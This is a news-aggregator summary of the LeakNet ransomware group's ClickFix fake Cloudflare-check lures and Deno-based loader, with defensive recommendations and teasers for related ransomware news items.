CP
cyberpings
Malware & RansomwareHIGH

LeakNet Ransomware - New ClickFix Lures and Deno Loader

CSCyber Security News
LeakNetClickFixDenoransomwaremalicious command
🎯

Basically, a ransomware group is using clever tricks to infect more computers quickly.

Quick Summary

LeakNet is ramping up its ransomware tactics with new ClickFix lures and a stealthy Deno loader. This shift poses serious risks to organizations as traditional defenses struggle to keep up. Enhanced monitoring and proactive measures are essential to combat these evolving threats.

What Happened

LeakNet, a ransomware group, is evolving its attack strategies. Previously, they targeted about three victims monthly. Recent findings indicate they are now scaling operations, leveraging new tools that can bypass standard security defenses. Two key innovations are a social engineering tactic called ClickFix and a stealthy loader based on the Deno JavaScript runtime.

The ClickFix method involves planting fake verification pages on compromised legitimate websites. When users encounter these pages, they see a familiar Cloudflare Turnstile check, prompting them to execute a command. This broad approach allows LeakNet to target a wider audience, as there is no specific victim profile. Analysts from ReliaQuest have linked this activity to LeakNet with high confidence, noting consistent tactics and infrastructure.

Who's Being Targeted

The shift to ClickFix puts any web-browsing employee at risk. Since the lures are hosted on legitimate sites, standard network defenses may not detect them, leading to a higher chance of user interaction. Once the malicious command is executed, it can trigger a series of harmful actions. The group also employs Microsoft Teams phishing, creating a consistent post-exploitation chain that makes detection easier for defenders but still poses a significant threat.

Signs of Infection

LeakNet's Deno-based loader is particularly concerning. This loader operates by installing the legitimate Deno executable on the victim's machine, running harmful code without leaving traditional file traces. The loader is activated through scripts named Romeo*.ps1 and Juliet*.vbs. By using a bring-your-own-runtime approach, LeakNet minimizes detection risks associated with deploying custom binaries.

Once activated, the loader collects system information and connects to attacker-controlled servers to fetch the next stage of the attack. This process remains largely invisible to signature-based security tools, making it a formidable threat.

How to Protect Yourself

Organizations should take immediate action to mitigate risks from LeakNet's tactics. Blocking newly registered domains can help, as their command-and-control servers are often short-lived. Additionally, restricting users from executing Win-R commands and limiting PsExec access to authorized administrators can reduce exposure. Security teams should monitor for unusual activities, such as jli.dll sideloading and unexpected outbound connections. Rapid isolation of compromised hosts is crucial to prevent ransomware deployment and protect sensitive data.

🔒 Pro insight: LeakNet's use of Deno for payload execution exemplifies a growing trend where attackers leverage trusted runtimes to evade detection.

Original article from

Cyber Security News · Tushar Subhra Dutta

Read Full Article

Share

Related Pings

CRITICALMalware & Ransomware

Interlock Ransomware - Exploiting Cisco FMC Zero-Day Flaw

A new ransomware campaign is exploiting a critical flaw in Cisco's software. Organizations using Cisco FMC are at risk of severe breaches. Immediate patching and security assessments are crucial to protect against this threat.

The Hacker News·
HIGHMalware & Ransomware

Ransomware - Marquis Reports Data Theft of 672K Individuals

Marquis, a Texas financial services firm, suffered a ransomware attack affecting over 670,000 individuals. The breach compromised sensitive personal data, raising serious security concerns. Affected individuals should monitor their accounts closely and take protective measures.

BleepingComputer·
HIGHMalware & Ransomware

Malware - New Campaigns Turn Devices Into DDoS and Mining Bots

New malware campaigns are hijacking network devices for DDoS attacks and crypto-mining. Routers and IoT devices are at risk, making immediate action essential. Protect your infrastructure to avoid exploitation.

Cyber Security News·
HIGHMalware & Ransomware

Malware - Iranian Hackers Used Stolen Credentials in Stryker Breach

A significant cyberattack on Stryker by Iranian hackers has disrupted operations globally. The attackers exploited stolen credentials, raising serious security concerns. Stryker is working to restore affected systems while authorities investigate the breach.

SecurityWeek·
HIGHMalware & Ransomware

Vidar Stealer 2.0 - Malware Delivered via Fake Game Cheats

A new malware campaign is exploiting fake game cheats on GitHub and Reddit to deliver Vidar 2.0. Gamers are at risk as they unknowingly install this dangerous infostealer. Stay informed and protect your data from these evolving threats.

Infosecurity Magazine·
HIGHMalware & Ransomware

Malware - GlassWorm Campaign Targets Python Repos via GitHub

A new malware campaign, ForceMemo, is targeting Python repositories on GitHub using stolen developer tokens. This poses a significant risk to developers and users alike. Vigilance is crucial to prevent compromise.

SC Media·